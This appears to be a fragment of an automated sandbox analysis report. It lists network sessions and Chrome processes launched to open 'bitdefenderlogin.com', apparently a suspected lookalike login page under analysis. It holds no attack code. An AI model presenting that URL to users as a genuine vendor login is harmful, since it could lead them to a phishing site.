                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                          1547192.168.2.55188254.150.37.130443
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                          1548192.168.2.55188054.150.37.130443
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                          1549192.168.2.55187954.150.37.130443
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Click to jump to process

                                                                                                                                                          Click to jump to process

                                                                                                                                                          Click to jump to process

                                                                                                                                                          Target ID:0
                                                                                                                                                          Start time:18:40:15
                                                                                                                                                          Start date:09/06/2024
                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                                                                                                          Imagebase:0x7ff715980000
                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:low
                                                                                                                                                          Has exited:false

                                                                                                                                                          Target ID:2
                                                                                                                                                          Start time:18:40:19
                                                                                                                                                          Start date:09/06/2024
                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=1964,i,8097275639217116545,5346654218420662378,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                          Imagebase:0x7ff715980000
                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:low
                                                                                                                                                          Has exited:false

                                                                                                                                                          Target ID:3
                                                                                                                                                          Start time:18:40:21
                                                                                                                                                          Start date:09/06/2024
                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "http://www.bitdefenderlogin.com/"
                                                                                                                                                          Imagebase:0x7ff715980000
                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:low
                                                                                                                                                          Has exited:true

                                                                                                                                                          No disassembly